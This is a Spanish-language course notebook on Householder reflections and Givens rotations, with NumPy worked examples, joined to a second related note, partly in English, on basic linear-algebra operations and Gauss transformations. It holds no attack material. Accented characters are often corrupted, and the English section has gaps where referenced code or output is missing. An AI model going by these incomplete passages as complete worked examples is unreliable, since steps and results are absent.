El vector $v^+ = - u_0^+ = x-||x||_2e_1$ refleja $x$ respecto al subespacio $H^+$ (que en el dibujo es una recta que cruza el origen). El vector $v^- = -u_0^- = x+||x||_2e_1$ refleja $x$ respecto al subespacio $H^-$.
Para reducir los errores por redondeo y evitar el problema de cancelaciรณn en la aritmรฉtica de punto flotante (ver [Sistema de punto flotante](https://itam-ds.github.io/analisis-numerico-computo-cientifico/I.computo_cientifico/1.2/Sistema_de_punto_flotante.html)) se utiliza:
$$v = x+signo(x_1)||x||_2e_1$$
donde: $signo(x_1) = \begin{cases}
1 &\text{ si } x_1 \geq 0 ,\\
-1 &\text{ si } x_1 < 0
\end{cases}.$
La idea de la definición anterior con la función $signo(\cdot)$ es que la reflexión (en el dibujo anterior $-||x||_2e_1$ o $||x||_2e_1$) sea lo más alejada posible de $x$. En el dibujo anterior como $x_1, x_2>0$ entonces se refleja respecto al subespacio $H^-$ quedando su reflexión igual a $-||x||_2e_1$.
```{admonition} Comentarios
* Otra forma de lidiar con el problema de cancelaciรณn es definiendo a la primera componente del vector de Householder $v_1$ como $v_1=x_1-||x||_2$ y haciendo una manipulaciรณn algebraica como sigue:
$$v_1=x_1-||x||_2 = \frac{x_1^2-||x||_2^2}{x_1+||x||_2} = -\frac{x_2^2+x_3^2+\dots + x_m^2}{x_1+||x||_2}.$$
* En la implementaciรณn del cรกlculo del vector de Householder, es รบtil que $v_1=1$ y asรญ รบnicamente se almacenarรก $v[2:m]$. Al vector $v[2:m]$ se le nombra **parte esencial del vector de Householder**.
* Las transformaciones de reflexiรณn de Householder se utilizan para la factorizaciรณn QR. Ver [QR decomposition](https://en.wikipedia.org/wiki/QR_decomposition), la cual es una factorizaciรณn estable numรฉricamente bajo el redondeo.
```
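Un bosquejo mínimo (no es la implementación de la nota) del cálculo del vector de Householder con la elección de signo anterior y la normalización $v_1=1$:
```
def householder_vector(x):
    """Bosquejo: regresa (v, beta) con v[0] = 1 tales que (I - beta v v^T)x = -signo(x_1)||x||_2 e_1."""
    x = np.asarray(x, dtype=float)
    signo = 1.0 if x[0] >= 0 else -1.0
    v = x.copy()
    v[0] = x[0] + signo*np.linalg.norm(x)   # v = x + signo(x_1)||x||_2 e_1
    beta = 2/v.dot(v)
    beta = beta*v[0]**2                     # se reescala beta para poder normalizar v_1 = 1
    v = v/v[0]                              # v[1:] es la parte esencial del vector de Householder
    return v, beta

x = np.array([1.0, 2.0, 3.0])
v, beta = householder_vector(x)
print(x - beta*v*v.dot(x))                  # (-||x||_2, 0, 0)
```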
```{admonition} Ejercicio
:class: tip
Reflejar al vector $\left [\begin{array}{c}1 \\1 \\\end{array}\right ]$ utilizando al vector $\left [\begin{array}{c}\frac{-4}{3}\\\frac{2}{3}\end{array}\right ]$ para construir $R$.
```
### Ejemplo aplicando reflectores de Householder a una matriz
Las reflexiones de Householder se utilizan para hacer ceros por debajo de la **diagonal** a una matriz y tener una forma triangular superior (mismo objetivo que las transformaciones de Gauss, ver {ref}`Ejemplo aplicando transformaciones de Gauss a una matriz <EG2>`). Por ejemplo si se han hecho ceros por debajo del elemento $a_{11}$ y se quieren hacer ceros debajo de $a_{22}^{(1)}$:
$$\begin{array}{l}
R_2A^{(1)} = R_2
\left[
\begin{array}{cccc}
* & * & * & *\\
0 & * & * & *\\
0 & * & * & * \\
0 & * & * & * \\
0 & * & * & *
\end{array}
\right]
=
\left[
\begin{array}{cccc}
* & * & * & *\\
0 & * & * & *\\
0 & 0 & * & * \\
0 & 0 & * & * \\
0 & 0 & * & *
\end{array}
\right]
:= A^{(2)}
\end{array}
$$
donde: $a^{(1)}_{ij}$ son las entradas de $A^{(1)} = R_1A^{(0)}$ y $A^{(0)}=A$, $R_1$ es matriz de reflexiรณn de Householder.
En este caso
$$R_2 =
\left [
\begin{array}{cc}
1 & 0 \\
0 & \hat{R_2}
\end{array}
\right ]
$$
con $\hat{R}_2$ una matriz de reflexión de Householder que hace ceros por debajo de $a_{22}^{(1)}$. Se tienen las siguientes propiedades de $R_2$:
* No modifica el primer renglรณn de $A^{(1)}$.
* No destruye los ceros de la primer columna de $A^{(1)}$.
* $R_2$ es una matriz de reflexiรณn de Householder.
```{admonition} Observaciรณn
:class: tip
Para la implementaciรณn computacional **no se inserta** $\hat{R}_2$ en $R_2$, en lugar de esto se aplica $\hat{R}_2$ a la submatriz $A^{(1)}[2:m, 2:m]$.
```
Considรฉrese a la matriz $A \in \mathbb{R}^{4 \times 3}$:
$$A =
\left [
\begin{array}{ccc}
3 & 2 & -1 \\
2 & 3 & 2 \\
-1 & 2 & 3 \\
2 & 1 & 4
\end{array}
\right ]
$$
y aplรญquense reflexiones de Householder para llevarla a una forma triangular superior.
```
A = np.array([[3 ,2, -1],
[2 ,3 ,2],
[-1, 2 ,3],
[2 ,1 ,4]], dtype = float)
print(A)
```
```{margin}
Usamos $e_1$ pues se desea hacer ceros en las entradas debajo de la primera entrada de la primera columna de $A$: $A[1:4,1]$.
```
```
e1 = np.array([1,0,0,0])
```
```{margin}
Recuerda la definiciรณn de $v= A[1:4,1] + signo(A[1,1])||A[1:4,1]||_2e_1$.
```
```
v = A[:,0] + np.linalg.norm(A[:,0])*e1
print(v)
```
```{margin}
Recuerda la definiciรณn de $\beta = \frac{2}{v^Tv}$ para $v$ no unitario.
```
```
beta = 2/v.dot(v)
print(beta)
```
```{margin}
Observa que por la definiciรณn de la reflexiรณn de Householder, **no necesitamos construir a la matriz $R_1$, directamente se tiene $R_1 A[1:4,1] = A[1:4,1] - \beta vv^TA[1:4,1]$.**
```
```
print(A[:,0] - beta*v*v.dot(A[:,0]))
```
```{margin}
Recuerda $A^{(1)} = R_1 A^{(0)}$.
```
```
A1 = A[:,0:]-beta*np.outer(v,v.dot(A[:,0:]))
print(A1)
```
```{admonition} Observaciรณn
:class: tip
Observa que a diferencia de las transformaciones de Gauss la reflexiรณn de Householder $R_1$ sรญ modifica el primer renglรณn de $A^{(0)}$, ver {ref}`Despuรฉs de hacer la multiplicaciรณn... <EG2.1>`.
```
```{margin}
Se preserva la norma $2$ o Euclidiana de $A[1:4,1]$.
```
```
print(np.linalg.norm(A1[:,0]))
print(np.linalg.norm(A[:,0]))
```
**A continuaciรณn queremos hacer ceros debajo de la segunda entrada de la segunda columna de $A^{(1)}$.**
```{margin}
Usamos $e_1$ pues se desea hacer ceros en las entradas debajo de la segunda entrada de la segunda columna de $A^{(1)}$: $A^{(1)}[2:4,2]$.
```
```
e1 = np.array([1, 0, 0])
```
```{margin}
Recuerda la definiciรณn de $v= A[2:4,2] + signo(A[2,2])||A[2:4,2]||_2e_1$.
```
```
v = A1[1:,1] + np.linalg.norm(A1[1:,1])*e1
print(v)
```
```{margin}
Recuerda la definiciรณn de $\beta = \frac{2}{v^Tv}$ para $v$ no unitario.
```
```
beta = 2/v.dot(v)
```
```{margin}
Observa que por la definiciรณn de la reflexiรณn de Householder, **no necesitamos construir a la matriz $R_2$, directamente se tiene $R_2A[2:4,2] = A[2:4,2] - \beta vv^TA[2:4,2]$.**
```
```
print(A1[1:,1] - beta*v*v.dot(A1[1:,1]))
```
```{margin}
Recuerda $A^{(2)} = R_2 A^{(1)}$ pero sรณlo operamos en $A^{(2)}[2:4, 2:3]$.
```
```
A2_aux = A1[1:,1:]-beta*np.outer(v,v.dot(A1[1:,1:]))
print(A2_aux)
```
```{margin}
Se preserva la norma $2$ o Euclidiana de $A[2:4,2]$.
```
```
print(np.linalg.norm(A1[1:,1]))
```
**A continuaciรณn queremos hacer ceros debajo de la tercera entrada de la tercera columna de $A^{(2)}$.**
```
e1 = np.array([1, 0])
v = A2_aux[1:,1] + np.linalg.norm(A2_aux[1:,1])*e1
print(v)
beta = 2/v.dot(v)
```
```{margin}
Recuerda $A^{(3)} = R_3 A^{(2)}$ pero sรณlo operamos en $A^{(2)}[3:4, 3]$.
```
```
A3_aux = A2_aux[1:,1]-beta*v*v.dot(A2_aux[1:,1])
print(A3_aux)
print(np.linalg.norm(A2_aux[1:,1]))
```
Entonces sรณlo falta colocar los renglones y columnas para tener a la matriz $A^{(3)}$. Para esto combinamos columnas y renglones en *numpy* con [column_stack](https://numpy.org/doc/stable/reference/generated/numpy.vstack.html) y *row_stack*:
```
m,n = A.shape
number_of_zeros = m-2
A3_aux_2 = np.column_stack((np.zeros(number_of_zeros), A3_aux))
print(A3_aux_2)
A3_aux_3 = np.row_stack((A2_aux[0, 0:], A3_aux_2))
print(A3_aux_3)
number_of_zeros = m-1
A3_aux_4 = np.column_stack((np.zeros(number_of_zeros), A3_aux_3))
print(A3_aux_4)
```
La matriz $A^{(3)} = R_3 R_2 R_1 A^{(0)}$ es:
```
A3 = np.row_stack((A1[0, 0:], A3_aux_4))
print(A3)
```
Podemos verificar lo anterior comparando con la matriz $R$ de la factorizaciรณn $QR$ de $A$:
```
q,r = np.linalg.qr(A)
print("Q:")
print(q)
print("R:")
print(r)
```
```{admonition} Ejercicio
:class: tip
Aplicar reflexiones de Householder a la matriz
$$A =
\left [
\begin{array}{cccc}
4 & 1 & -2 & 2 \\
1 & 2 & 0 & 1\\
-2 & 0 & 3 & -2 \\
2 & 1 & -2 & -1
\end{array}
\right ]
$$
para obtener una matriz triangular superior.
```
(TROT)=
## Transformaciones de rotaciรณn
En esta sección suponemos que $A \in \mathbb{R}^{m \times n}$ y $A$ es una matriz con entradas $a_{ij} \in \mathbb{R}$ $\forall i=1,2,\dots,m, j=1, 2, \dots, n$.
Si $u, v \in \mathbb{R}^2-\{0\}$ con $\ell = ||u||_2 = ||v||_2$ y se desea rotar al vector $u$ en sentido contrario a las manecillas del reloj por un รกngulo $\theta$ para llevarlo a la direcciรณn de $v$:
<img src="https://dl.dropboxusercontent.com/s/vq8eu0yga2x7cb2/rotation_1.png?dl=0" heigth="500" width="500">
A partir de las relaciones anteriores como $cos(\phi)=\frac{u_1}{\ell}, sen(\phi)=\frac{u_2}{\ell}$ se tiene: $v_1 = (cos\theta)u_1-(sen\theta)u_2$, $v_2=(sen\theta)u_1+(cos\theta)u_2$ equivalentemente:
$$\begin{array}{l}
\left[\begin{array}{c}
v_1\\
v_2
\end{array}
\right]
=
\left[ \begin{array}{cc}
cos\theta & -sen\theta\\
sen\theta & cos\theta
\end{array}
\right] \cdot
\left[\begin{array}{c}
u_1\\
u_2
\end{array}
\right]
\end{array}
$$
```{admonition} Definiciรณn
La matriz $R_O$:
$$R_O=
\left[ \begin{array}{cc}
cos\theta & -sen\theta\\
sen\theta & cos\theta
\end{array}
\right]
$$
se nombra matriz de **rotaciรณn** o **rotaciones Givens**, es una matriz ortogonal pues $R_O^TR_O=I_2$.
La multiplicaciรณn $v=R_Ou$ es una rotaciรณn en sentido contrario a las manecillas del reloj, de hecho cumple $det(R_O)=1$. La multiplicaciรณn $u=R_O^Tv$ es una rotaciรณn en sentido de las manecillas del reloj y el รกngulo asociado es $-\theta$.
```
### Ejemplo aplicando rotaciones Givens a un vector
Rotar al vector $v=(1,1)^T$ un รกngulo de $45^o$ en **sentido contrario a las manecillas del reloj**.
```
v=np.array([1,1])
```
La matriz $R_O$ es:
$$R_O = \left[ \begin{array}{cc}
cos(\frac{\pi}{4}) & -sen(\frac{\pi}{4})\\
sen(\frac{\pi}{4}) & cos(\frac{\pi}{4})
\end{array}
\right ]
$$
```
theta=math.pi/4
RO=np.array([[math.cos(theta), -math.sin(theta)],
[math.sin(theta), math.cos(theta)]])
print(RO)
print(RO@v)
print(np.linalg.norm(v))
```
```{admonition} Observaciรณn
:class: tip
Observa que se preserva la norma $2$ o Euclidiana del vector, las matrices de rotaciรณn Givens son matrices ortogonales y por tanto isometrรญas: $||R_0v||_2=||v||_2$.
```
En el ejemplo anterior se hizo cero la entrada $v_1$ de $v$. Las matrices de rotaciรณn se utilizan para hacer ceros en entradas de un vector. Por ejemplo si $v=(v_1,v_2)^T$ y **se desea hacer cero la entrada $v_2$ de $v$** se puede utilizar la matriz de rotaciรณn:
$$R_O = \left[ \begin{array}{cc}
\frac{v_1}{\sqrt{v_1^2+v_2^2}} & \frac{v_2}{\sqrt{v_1^2+v_2^2}}\\
-\frac{v_2}{\sqrt{v_1^2+v_2^2}} & \frac{v_1}{\sqrt{v_1^2+v_2^2}}
\end{array}
\right ]
$$
pues:
$$\begin{array}{l}
\left[ \begin{array}{cc}
\frac{v_1}{\sqrt{v_1^2+v_2^2}} & \frac{v_2}{\sqrt{v_1^2+v_2^2}}\\
-\frac{v_2}{\sqrt{v_1^2+v_2^2}} & \frac{v_1}{\sqrt{v_1^2+v_2^2}}
\end{array}
\right ] \cdot
\left[\begin{array}{c}
v_1\\
v_2
\end{array}
\right]=
\left[ \begin{array}{c}
\frac{v_1^2+v_2^2}{\sqrt{v_1^2+v_2^2}}\\
\frac{-v_1v_2+v_1v_2}{\sqrt{v_1^2+v_2^2}}
\end{array}
\right ]
=
\left[ \begin{array}{c}
\frac{v_1^2+v_2^2}{\sqrt{v_1^2+v_2^2}}\\
0
\end{array}
\right ]=
\left[ \begin{array}{c}
||v||_2\\
0
\end{array}
\right ]
\end{array}
$$
Y definiendo $cos(\theta)=\frac{v_1}{\sqrt{v_1^2+v_2^2}}, sen(\theta)=\frac{v_2}{\sqrt{v_1^2+v_2^2}}$ se tiene :
$$
R_O=\left[ \begin{array}{cc}
cos\theta & sen\theta\\
-sen\theta & cos\theta
\end{array}
\right]
$$
que en el ejemplo anterior como $v=(1,1)^T$ entonces: $cos(\theta)=\frac{1}{\sqrt{2}}, sen(\theta)=\frac{1}{\sqrt{2}}$ por lo que $\theta=\frac{\pi}{4}$ y:
$$
R_O=\left[ \begin{array}{cc}
\frac{1}{\sqrt{2}} & \frac{1}{\sqrt{2}}\\
-\frac{1}{\sqrt{2}} & \frac{1}{\sqrt{2}}
\end{array}
\right]
$$
que es una matriz de rotaciรณn para un รกngulo que gira **en sentido de las manecillas del reloj**.
Para **hacer cero la entrada $v_1$ de $v$** hay que usar:
$$\begin{array}{l}
R_O=\left[ \begin{array}{cc}
cos\theta & -sen\theta\\
sen\theta & cos\theta
\end{array}
\right]
=\left[ \begin{array}{cc}
\frac{1}{\sqrt{2}} & -\frac{1}{\sqrt{2}}\\
\frac{1}{\sqrt{2}} & \frac{1}{\sqrt{2}}
\end{array}
\right]
\end{array}
$$
que es una matriz de rotaciรณn para un รกngulo que gira **en sentido contrario de las manecillas del reloj**.
```{admonition} Ejercicio
:class: tip
Usar una matriz de rotaciรณn Givens para rotar al vector $(-3, 4)^T$ un รกngulo de $\frac{\pi}{3}$ en sentido de las manecillas del reloj.
```
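Un bosquejo mínimo de una función auxiliar que construye $cos\theta$ y $sen\theta$ para anular la segunda entrada de un par $(a, b)^T$ con $(a,b) \neq (0,0)$, que es el cálculo que se repite en el siguiente ejemplo:
```
def givens(a, b):
    """Bosquejo: regresa (cos_theta, sen_theta) tales que
    [[c, s], [-s, c]] @ (a, b)^T = (sqrt(a^2 + b^2), 0)^T."""
    norm = math.sqrt(a**2 + b**2)
    return a/norm, b/norm

c, s = givens(1.0, 1.0)
RO = np.array([[c, s],
               [-s, c]])
print(RO@np.array([1.0, 1.0]))   # (sqrt(2), 0)
```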
### Ejemplo aplicando rotaciones Givens a una matriz
Las rotaciones Givens permiten hacer ceros en entradas de una matriz que son **seleccionadas**. Por ejemplo si se desea hacer cero la entrada $x_4$ de $x \in \mathbb{R}^4$, se definen $cos\theta = \frac{x_2}{\sqrt{x_2^2 + x_4^2}}, sen\theta = \frac{x_4}{\sqrt{x_2^2 + x_4^2}}$ y
$$
R_{24}^\theta=
\left [
\begin{array}{cccc}
1 & 0 & 0 & 0\\
0 & cos\theta & 0 & sen\theta \\
0 & 0 & 1 & 0 \\
0 & -sen\theta & 0 & cos\theta
\end{array}
\right ]
$$
entonces:
$$
R_{24}^\theta x =
\begin{array}{l}
\left [
\begin{array}{cccc}
1 & 0 & 0 & 0\\
0 & cos\theta & 0 & sen\theta \\
0 & 0 & 1 & 0 \\
0 & -sen\theta & 0 & cos\theta
\end{array}
\right ]
\left [
\begin{array}{c}
x_1 \\
x_2 \\
x_3 \\
x_4
\end{array}
\right ]
=
\left [
\begin{array}{c}
x_1 \\
\sqrt{x_2^2 + x_4^2} \\
x_3 \\
0
\end{array}
\right ]
\end{array}
$$
Y se escribe que se hizo una rotaciรณn en el plano $(2,4)$.
```{admonition} Observaciรณn
:class: tip
Obsรฉrvese que sรณlo se modificaron dos entradas de $x$: $x_2, x_4$ por lo que el mismo efecto se obtiene al hacer la multiplicaciรณn:
$$
\begin{array}{l}
\left[ \begin{array}{cc}
cos\theta & -sen\theta\\
sen\theta & cos\theta
\end{array}
\right]
\left [
\begin{array}{c}
x_2\\
x_4
\end{array}
\right ]
\end{array}
$$
para tales entradas.
```
Considรฉrese a la matriz $A \in \mathbb{R}^{4 \times 4}$:
$$A =
\left [
\begin{array}{cccc}
4 & 1 & -2 & 2 \\
1 & 2 & 0 & 1\\
-2 & 0 & 3 & -2 \\
2 & 1 & -2 & -1
\end{array}
\right ]
$$
y aplรญquense rotaciones Givens para hacer ceros en las entradas debajo de la diagonal de $A$ y tener una matriz **triangular superior**.
**Entrada $a_{21}$, plano $(1,2)$:**
```
idx_1 = 0
idx_2 = 1
idx_column = 0
A = np.array([[4, 1, -2, 2],
[1, 2, 0, 1],
[-2, 0, 3, -2],
[2, 1, -2, -1]], dtype=float)
print(A)
a_11 = A[idx_1,idx_column]
a_21 = A[idx_2,idx_column]
norm = math.sqrt(a_11**2 + a_21**2)
cos_theta = a_11/norm
sen_theta = a_21/norm
R12 = np.array([[cos_theta, sen_theta],
[-sen_theta, cos_theta]])
print(R12)
```
```{margin}
Extraemos sรณlo los renglones a los que se les aplicarรก la matriz de rotaciรณn.
```
```
A_subset = np.row_stack((A[idx_1,:], A[idx_2,:]))
print(A_subset)
print(R12@A_subset)
A1_aux = R12@A_subset
print(A1_aux)
```
Hacemos copia para un fรกcil manejo de los รญndices y matrices modificadas. Podrรญamos tambiรฉn usar [numpy.view](https://numpy.org/doc/stable/reference/generated/numpy.ndarray.view.html).
```
A1 = A.copy()
A1[idx_1, :] = A1_aux[0, :]
A1[idx_2, :] = A1_aux[1, :]
```
```{margin}
$A^{(1)} = R_{12}^\theta A^{(0)}$.
```
```
print(A1)
print(A)
```
```{margin}
Se preserva la norma 2 o Euclidiana de $A[1:4,1]$.
```
```
print(np.linalg.norm(A1[:, idx_column]))
print(np.linalg.norm(A[:, idx_column]))
```
**Entrada $a_{31}$, plano $(1,3)$:**
```
idx_1 = 0
idx_2 = 2
idx_column = 0
a_11 = A1[idx_1, idx_column]
a_31 = A1[idx_2, idx_column]
norm = math.sqrt(a_11**2 + a_31**2)
cos_theta = a_11/norm
sen_theta = a_31/norm
R13 = np.array([[cos_theta, sen_theta],
[-sen_theta, cos_theta]])
print(R13)
```
```{margin}
Extraemos sรณlo los renglones a los que se les aplicarรก la matriz de rotaciรณn.
```
```
A1_subset = np.row_stack((A1[idx_1,:], A1[idx_2,:]))
print(A1_subset)
print(R13@A1_subset)
A2_aux = R13@A1_subset
print(A2_aux)
A2 = A1.copy()
A2[idx_1, :] = A2_aux[0, :]
A2[idx_2, :] = A2_aux[1, :]
```
```{margin}
$A^{(2)} = R_{13}^\theta A^{(1)}$.
```
```
print(A2)
print(A1)
print(A)
```
```{margin}
Se preserva la norma 2 o Euclidiana de $A[1:4,1]$.
```
```
print(np.linalg.norm(A2[:, idx_column]))
print(np.linalg.norm(A[:, idx_column]))
```
**Entrada $a_{41}$, plano $(1,4)$:**
```
idx_1 = 0
idx_2 = 3
idx_column = 0
a_11 = A2[idx_1, idx_column]
a_41 = A2[idx_2, idx_column]
norm = math.sqrt(a_11**2 + a_41**2)
cos_theta = a_11/norm
sen_theta = a_41/norm
R14 = np.array([[cos_theta, sen_theta],
[-sen_theta, cos_theta]])
print(R14)
```
```{margin}
Extraemos sรณlo los renglones a los que se les aplicarรก la matriz de rotaciรณn.
```
```
A2_subset = np.row_stack((A2[idx_1,:], A2[idx_2,:]))
print(A2_subset)
print(R14@A2_subset)
A3_aux = R14@A2_subset
print(A3_aux)
A3 = A2.copy()
A3[idx_1, :] = A3_aux[0, :]
A3[idx_2, :] = A3_aux[1, :]
```
```{margin}
$A^{(3)} = R_{14}^\theta A^{(2)}$.
```
```
print(A3)
print(A2)
```
```{margin}
Se preserva la norma 2 o Euclidiana de $A[1:4,1]$.
```
```
print(np.linalg.norm(A3[:, idx_column]))
print(np.linalg.norm(A[:, idx_column]))
```
**Entrada $a_{32}$, plano $(2,3)$:**
```
idx_1 = 1
idx_2 = 2
idx_column = 1
a_22 = A2[idx_1, idx_column]
a_32 = A2[idx_2, idx_column]
norm = math.sqrt(a_22**2 + a_32**2)
cos_theta = a_22/norm
sen_theta = a_32/norm
R23 = np.array([[cos_theta, sen_theta],
[-sen_theta, cos_theta]])
print(R23)
```
```{margin}
Extraemos sรณlo los renglones a los que se les aplicarรก la matriz de rotaciรณn.
```
```
A3_subset = np.row_stack((A3[idx_1,:], A3[idx_2,:]))
print(A3_subset)
print(R23@A3_subset)
A4_aux = R23@A3_subset
print(A4_aux)
A4 = A3.copy()
A4[idx_1, :] = A4_aux[0, :]
A4[idx_2, :] = A4_aux[1, :]
```
```{margin}
$A^{(4)} = R_{23}^\theta A^{(3)}$.
```
```
print(A4)
print(A3)
print(A2)
```
```{margin}
Se preserva la norma 2 o Euclidiana de $A[1:4,2]$.
```
```
print(np.linalg.norm(A4[:, idx_column]))
print(np.linalg.norm(A[:, idx_column]))
```
```{admonition} Ejercicio
:class: tip
Finalizar el ejercicio para llevar a la matriz $A$ a una matriz triangular superior.
```
```{admonition} Ejercicios
:class: tip
1. Resuelve los ejercicios y preguntas de la nota.
```
**Preguntas de comprensión.**
1) Escribe ejemplos de operaciones vectoriales y matriciales básicas del Álgebra Lineal Numérica.
2) ¿Para qué se utilizan las transformaciones de Gauss?
3) Escribe nombres de factorizaciones en las que se utilizan las transformaciones de Gauss.
4) Escribe propiedades que tiene una matriz ortogonal.
5) ¿Una matriz ortogonal es rectangular?
6) ¿Qué propiedades tienen las matrices de proyección, reflexión y rotación?
7) ¿Qué problema numérico se quiere resolver al definir un vector de Householder como $x+signo(x_1)||x||_2e_1$?
**Referencias:**
1. G. H. Golub, C. F. Van Loan, Matrix Computations, Johns Hopkins University Press, 2013.
|
github_jupyter
|
---
Nota generada a partir de [liga1](https://www.dropbox.com/s/fyqwiqasqaa3wlt/3.1.1.Multiplicacion_de_matrices_y_estructura_de_datos.pdf?dl=0), [liga2](https://www.dropbox.com/s/jwu8lu4r14pb7ut/3.2.1.Sistemas_de_ecuaciones_lineales_eliminacion_Gaussiana_y_factorizacion_LU.pdf?dl=0) y [liga3](https://www.dropbox.com/s/s4ch0ww1687pl76/3.2.2.Factorizaciones_matriciales_SVD_Cholesky_QR.pdf?dl=0).
Las operaciones bรกsicas del รlgebra Lineal Numรฉrica podemos dividirlas en vectoriales y matriciales.
## Vectoriales
* **Transponer:** $\mathbb{R}^{n \times 1} \rightarrow \mathbb{R} ^{1 \times n}$: $y = x^T$ entonces $x = \left[ \begin{array}{c} x_1 \\ x_2 \\ \vdots \\ x_n \end{array} \right ]$ y se tiene: $y = x^T = [x_1, x_2, \dots, x_n].$
* **Suma:** $\mathbb{R}^n \times \mathbb{R} ^n \rightarrow \mathbb{R}^n$: $z = x + y$ entonces $z_i = x_i + y_i$
* **Multiplicaciรณn por un escalar:** $\mathbb{R} \times \mathbb{R} ^n \rightarrow \mathbb{R}^n$: $y = \alpha x$ entonces $y_i = \alpha x_i$.
* **Producto interno estรกndar o producto punto:** $\mathbb{R}^n \times \mathbb{R} ^n \rightarrow \mathbb{R}$: $c = x^Ty$ entonces $c = \displaystyle \sum_{i=1}^n x_i y_i$.
* **Multiplicaciรณn *point wise:*** $\mathbb{R}^n \times \mathbb{R} ^n \rightarrow \mathbb{R}^n$: $z = x.*y$ entonces $z_i = x_i y_i$.
* **Divisiรณn *point wise:*** $\mathbb{R}^n \times \mathbb{R} ^n \rightarrow \mathbb{R}^n$: $z = x./y$ entonces $z_i = x_i /y_i$ con $y_i \neq 0$.
* **Producto exterior o *outer product*:** $\mathbb{R}^n \times \mathbb{R} ^n \rightarrow \mathbb{R}^{n \times n}$: $A = xy^T$ entonces $A[i, :] = x_i y^T$ con $A[i,:]$ el $i$-รฉsimo renglรณn de $A$.
## Matriciales
* **Transponer:** $\mathbb{R}^{m \times n} \rightarrow \mathbb{R}^{n \times m}$: $C = A^T$ entonces $c_{ij} = a_{ji}$.
* **Sumar:** $\mathbb{R}^{m \times n} \times \mathbb{R}^{m \times n} \rightarrow \mathbb{R}^{m \times n}$: $C = A + B$ entonces $c_{ij} = a_{ij} + b_{ij}$.
* **Multiplicaciรณn por un escalar:** $\mathbb{R} \times \mathbb{R}^{m \times n} \rightarrow \mathbb{R}^{m \times n}$: $C = \alpha A$ entonces $c_{ij} = \alpha a_{ij}$
* **Multiplicaciรณn por un vector:** $\mathbb{R}^{m \times n} \times \mathbb{R}^{n} \rightarrow \mathbb{R}^{m}$: $y = Ax$ entonces $y_i = \displaystyle \sum_{j=1}^n a_{ij}x_j$.
* **Multiplicaciรณn entre matrices:** $\mathbb{R}^{m \times k} \times \mathbb{R}^{k \times n} \rightarrow \mathbb{R}^{m \times n}$: $C = AB$ entonces $c_{ij} = \displaystyle \sum_{r=1}^k a_{ir}b_{rj}$.
* **Multiplicaciรณn *point wise*:** $\mathbb{R}^{m \times n} \times \mathbb{R}^{m \times n} \rightarrow \mathbb{R}^{m \times n}$: $C = A.*B$ entonces $c_{ij} = a_{ij}b_{ij}$.
* **Divisiรณn *point wise*:** $\mathbb{R}^{m \times n} \times \mathbb{R}^{m \times n} \rightarrow \mathbb{R}^{m \times n}$: $C = A./B$ entonces $c_{ij} = a_{ij}/b_{ij}$ con $b_{ij} \neq 0$.
**Examples of basic transformations in Numerical Linear Algebra include:**
(TGAUSS)=
## Gauss transformations
In this section we assume that $A \in \mathbb{R}^{n \times n}$ is a matrix with entries $a_{ij} \in \mathbb{R}$ for all $i,j=1,2,\dots,n$.
Consider a vector $a \in \mathbb{R}^{n}$ and let $e_k \in \mathbb{R}^n$ be the $k$-th canonical vector: the vector with a $1$ in position $k$ and zeros in the remaining entries.
Gauss transformations are used to zero out the entries below the **pivot**. A Gauss transformation has the form $L_k = I - \ell_k e_k^T$, where the first $k$ entries of $\ell_k$ are zero and $\ell_{ik} = a_i/a_k$ for $i > k$.
(EG1)=
### Example: applying Gauss transformations to a vector
Consider the vector $a=(-2,3,4)^T$. Define a Gauss transformation that zeros out the entries below $a_1$, and another Gauss transformation that zeros out the entry $a_3$.
**Solution:**
a) To zero out the entries below the **pivot** $a_1 = -2$:
Below it is shown that the product $L_1 a$, computed by building $L_1$ explicitly, is equivalent to the above:
b) To zero out the entries below the **pivot** $a_2 = 3$:
Below it is shown that the product $L_2 a$, computed by building $L_2$ explicitly, is equivalent to the above:
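The code cells of the original notebook are not included in this excerpt, so the following is a minimal NumPy sketch of this example that builds $L_1$ and $L_2$ explicitly (in practice the products $L_k a$ are computed without forming the matrices):
```
import numpy as np

a = np.array([-2., 3., 4.])
e1 = np.array([1., 0., 0.])
e2 = np.array([0., 1., 0.])

# a) zero out the entries below the pivot a_1 = -2
l1 = np.array([0., a[1] / a[0], a[2] / a[0]])
L1 = np.eye(3) - np.outer(l1, e1)
print(L1 @ a)    # [-2.  0.  0.]

# b) zero out the entry below the pivot a_2 = 3
l2 = np.array([0., 0., a[2] / a[1]])
L2 = np.eye(3) - np.outer(l2, e2)
print(L2 @ a)    # [-2.  3.  0.]
```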
(EG2)=
### Example: applying Gauss transformations to a matrix
If we have a matrix $A \in \mathbb{R}^{3 \times 3}$ and we want to zero out the entries below its **diagonal** to obtain an **upper triangular** form, we perform the matrix products:
$$L_2 L_1 A$$
where $L_1, L_2$ are Gauss transformations.
After performing the product $L_2 L_1 A$ we obtain an **upper triangular matrix:**
$$
L_2L_1A = \left [
\begin{array}{ccc}
* & * & *\\
0 & * & * \\
0 & 0 & *
\end{array}
\right ]
$$
**Example:**
a) Using $L_1$
To zero out the entries below the **pivot** $a_{11} = -1$:
**$L_1$ must also be applied to columns 2 and 3 of $A$ to complete the product $L_1A$:**
Below it is shown that the product $L_1 A$, computed by building $L_1$ explicitly, is equivalent to the above:
(EG2.1)=
**After performing the multiplication $L_1A$ in either of the two cases (building $L_1$ explicitly or not), the first row of $A$ is not modified:**
**so the multiplication $L_1A$ modifies $A$ from the second row onwards and from the second column onwards.**
and this can be written compactly:
$$e_1^T A[1:3,2:3] = A[0, 2:3]$$
Then the products $\ell_1 e_1^T A[:,2]$ and $\ell_1 e_1^T A[:,3]$ become, respectively:
$$\ell_1A[0, 2]$$
$$\ell_1A[0,3]$$
In compact form, and taking advantage of *NumPy* functions such as [np.outer](https://numpy.org/doc/stable/reference/generated/numpy.outer.html), the above can be computed as:
And finally, applying $L_1$ to $A$ from the second row and second column onwards gives:
Compare with:
Then it only remains to attach the first row and first column to the product. For this we combine columns and rows in *numpy* with [column_stack](https://numpy.org/doc/stable/reference/generated/numpy.vstack.html) and *row_stack*:
which is the result of:
**What remains in order to obtain an upper triangular matrix is the multiplication $L_2L_1A$.** In this case the matrix $L_2=I_3 - \ell_2e_2^T$ uses $\ell_2 = \left( 0, 0, \frac{a^{(1)}_{32}}{a^{(1)}_{22}} \right )^T$, where $a^{(1)}_{ij}$ are the entries of $A^{(1)} = L_1A^{(0)}$ and $A^{(0)}=A$.
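The matrix used in the original code cells is not shown in this excerpt, so the sketch below applies the same two steps to an arbitrary $3 \times 3$ example with $a_{11} = -1$:
```
import numpy as np

A = np.array([[-1., 2., 3.],
              [ 2., 1., 4.],
              [ 3., 0., 5.]])
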